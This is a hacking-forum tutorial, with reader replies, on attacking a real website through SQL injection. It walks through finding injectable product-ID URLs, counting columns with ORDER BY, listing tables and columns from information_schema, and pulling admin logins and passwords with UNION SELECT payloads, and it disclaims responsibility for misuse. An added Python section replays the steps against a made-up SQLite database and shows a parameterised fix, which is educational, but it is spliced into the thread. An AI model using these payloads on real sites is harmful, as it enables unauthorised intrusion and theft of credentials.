[Website Hacking] SQL Injection
Hello there Cyber Forums, today I'll be going over the steps of performing an SQL injection attack. I would like to state that I will be using a site I have already performed this attack on for the sake of this tutorial. I am not responsible for how you use what you have learned here, so let's get started.

The site I will be using:

Step 1. The website
Okay, so this website has been designed very poorly. It has a constant green colour scheme and a clumsy navigation panel, with several sections such as "Products" and "Links". Overall it is a pretty shoddy site.

Step 2. Finding the vulnerability
Before we can do the attack we need to find a page that takes a value from the URL and uses it in a database query.
To do this, browse the site and follow the links from the main page; for this example I'll use "Products". In the "Products" section pick a product group, "Herbs" in my case, then click a product within that category and you will be taken to that product's page. Now look at the website URL: the pages worth testing are the ones where the product is selected by a number in the URL, something like

If it does, then to find out whether it is vulnerable we append a single quote ' or a piece of logic that breaks the query's syntax, such as 1=0--
If done correctly the URL should look like
products.php?prodid=<number>' or 1=0--

If the site is vulnerable (and shows database errors) you should get an error like this.
Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1

The error tells you that the value reached MySQL without being escaped. A site that hides its errors can still be injectable, but you will only see a blank or broken page. Also, MySQL only treats -- as a comment when it is followed by a space, so in a URL the comment is usually written as --+ or -- - (the + is decoded to a space).

Step 3. Exploiting the vulnerability
If you got this far you have understood the first 2 steps, so let's move on. Before we can pull out data we need to know how many columns the page's query selects, because the UNION we use later has to return the same number. ORDER BY <n> sorts by the nth selected column and errors once n is larger than the column count, so we find the count by trying numbers. Start by typing the following into the website URL.
products.php?prodid=<number> order by 20--

For this website it should come up with an error that says,
Error performing query: Unknown column '20' in 'order clause'

If it does, we know our number is too big, so let's cut it in half and put 15 into the URL.
products.php?prodid=<number> order by 15--

We get the same error again, this time with the number 15. Drop by 5 more to 10; if done correctly it should be
products.php?prodid=<number> order by 10--

Still the same error, now with the number 10, so why not drop to 5?
products.php?prodid=<number> order by 5--

No more error: the page loads normally, so the query has at least 5 columns. We still need the exact count to do this attack properly, so increase the number by 1 until the page errors again; the last value that loads without an error is the number of columns. On this site that turned out to be 7, which is why the UNION in the next step has 7 values.

Step 4. Finding the table names
If you have followed all the steps properly you can now start getting the table and column names. This part of the tutorial covers the table names first.

Okay so, a "table" is what SQL calls a set of rows, and MySQL keeps the list of all tables in a built-in schema called information_schema. To read it we delete what we currently have after prodid= and replace it with a UNION SELECT that has one value per column found in Step 3 (7 here). We also put a minus sign (-) in front of the product id so that the original query returns no row and only our injected row is displayed.
products.php?prodid=-<number> union select 1,2,3,4,5,6,7--

If done correctly you should see one or more of the numbers 1 to 7 on the screen; each number that appears marks a column the page actually displays, and that is where we will put the data we want. If you still see the product's own text instead of numbers, check that the minus sign is in front of the product id.

Now to get the table names, replace the number in a displayed column (3 here) with table_name from information_schema.tables.
products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables--

If done correctly you should see text such as.

You may now scroll through the tables and pick what you want; I want admin login info so I will use the "admin" table I found. If the page only renders a single row, use group_concat(table_name) instead of table_name to get every name in one row, and add where table_schema=database() to skip MySQL's own system tables.

Step 5. Getting column names
Okay, to get the names of what SQL calls the "columns" of a table, go back to the URL from "Step 4" and change it to this.
products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--

As written this lists the columns of every table on the server; add where table_name='admin' (or the hex form 0x61646d696e if quotes are filtered) to see only the admin table's columns. Look through what comes back; as I said, I wanted the admin login, so I will use the columns "login" and "password".

Step 6. Getting our login info
Okay, to get the login info we wanted, we need to have written down the table and column names we found; if we didn't, we need to look again. I wrote down what I needed, which is below.
login, password, admin

Now you may be wondering how we use what we have obtained; it's simple. Take the string we currently have, which should be
products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--

and replace "column_name" with "concat(login,0x3a,password)" and "information_schema.columns" with "admin". The 0x3a is a hex-encoded colon, so each row comes back as login:password. Once this is done the URL should look like this.
products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin--

If you did this correctly the username and password show up on the page, which means you have followed this tutorial correctly and done a SQL injection attack. If the password looks like a long hex string it is a hash rather than the plain password and still has to be cracked.

If you need any help with anything regarding this thread post below and I'll try to help you.

Also, neither I nor the staff of Cyber Forums are responsible for how you use what you have learned from this tutorial AT ALL!
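To make the six steps concrete, here is an added example that is not part of the original post: it replays the probe, the ORDER BY column count, the UNION extraction and the fix against a constructed in-memory SQLite database. SQLite stands in for the tutorial's MySQL target, so information_schema becomes sqlite_master and pragma_table_info, and concat(login,0x3a,password) becomes login || ':' || password; the products and admin tables, the sample rows and the helper names (vulnerable_lookup, find_column_count, union_extract, safe_lookup) are all made up for the demo.

```python
import sqlite3

# Constructed stand-in for the tutorial's target: a 7-column "products" table and an
# "admin" table. SQLite is used so this runs offline; the tutorial's target was MySQL,
# so information_schema becomes sqlite_master / pragma_table_info and concat() becomes ||.


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, category TEXT, "
                 "stock INTEGER, sku TEXT, notes TEXT)")
    conn.executemany("INSERT INTO products VALUES (?,?,?,?,?,?,?)", [
        (1, "Basil", 2.5, "Herbs", 10, "H-001", ""),   # constructed sample rows
        (2, "Thyme", 3.0, "Herbs", 4, "H-002", ""),
    ])
    conn.execute("CREATE TABLE admin (id INTEGER, login TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', 'hunter2')")  # constructed credential
    return conn


def vulnerable_lookup(conn, prodid):
    """products.php as the tutorial describes it: prodid is pasted straight into the SQL.
    Returns the selected rows, or the error string the page would print (Step 2)."""
    query = ("SELECT id, name, price, category, stock, sku, notes FROM products "
             "WHERE id = " + prodid)
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        return "Error performing query: " + str(exc)


def safe_lookup(conn, prodid):
    """The fix: validate the type and bind the value, so the SQL text never changes."""
    if not prodid.isdigit():
        return []
    return conn.execute("SELECT id, name, price, category, stock, sku, notes FROM products "
                        "WHERE id = ?", (int(prodid),)).fetchall()


def is_error(result):
    return isinstance(result, str)


def find_column_count(conn, prodid, limit=20):
    """Step 3 as a bisection: ORDER BY n works up to the column count and errors past it."""
    def works(n):
        return not is_error(vulnerable_lookup(conn, f"{prodid} order by {n}--"))
    if works(limit):
        return None              # more columns than we are willing to probe for
    lo, hi = 0, limit            # lo is known good (0 is never tested), hi is known bad
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if works(mid):
            lo = mid
        else:
            hi = mid
    return lo


def union_extract(conn, prodid, expression, source, displayed_col=3):
    """Steps 4-6: negative id so the real row vanishes, then a UNION whose value count
    matches the column count; `expression` lands in the column the page displays."""
    count = find_column_count(conn, prodid)
    if count is None:
        return []
    values = [str(i) for i in range(1, count + 1)]
    values[displayed_col - 1] = expression
    payload = f"-{prodid} union select {','.join(values)} from {source}--"
    rows = vulnerable_lookup(conn, payload)
    return [] if is_error(rows) else [row[displayed_col - 1] for row in rows]


def demo():
    """Run the tutorial's steps end to end and return what each one produced."""
    conn = build_db()
    return {
        "probe": vulnerable_lookup(conn, "1' or 1=0--"),            # Step 2: syntax error
        "columns": find_column_count(conn, "1"),                    # Step 3: 7
        "tables": union_extract(conn, "1", "name",
                                "sqlite_master where type='table'"),  # Step 4
        "admin_columns": union_extract(conn, "1", "name",
                                       "pragma_table_info('admin')"),  # Step 5
        "creds": union_extract(conn, "1", "login || ':' || password", "admin"),  # Step 6
        "fixed": safe_lookup(conn, "-1 union select 1,2,3,4,5,6,7--"),  # payload rejected
    }


if __name__ == "__main__":
    for step, result in demo().items():
        print(step, result)
```

The bisection in find_column_count is the halving the tutorial does by hand (20, 10, 5, then upwards), and safe_lookup shows why parameter binding ends the whole chain: every payload is either rejected as a non-integer or bound as a plain number, so ORDER BY and UNION never reach the parser as SQL.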
Nice, well written tutorial. Thanks man!
Awesome tutorial, looks awesome. Keep it up bro
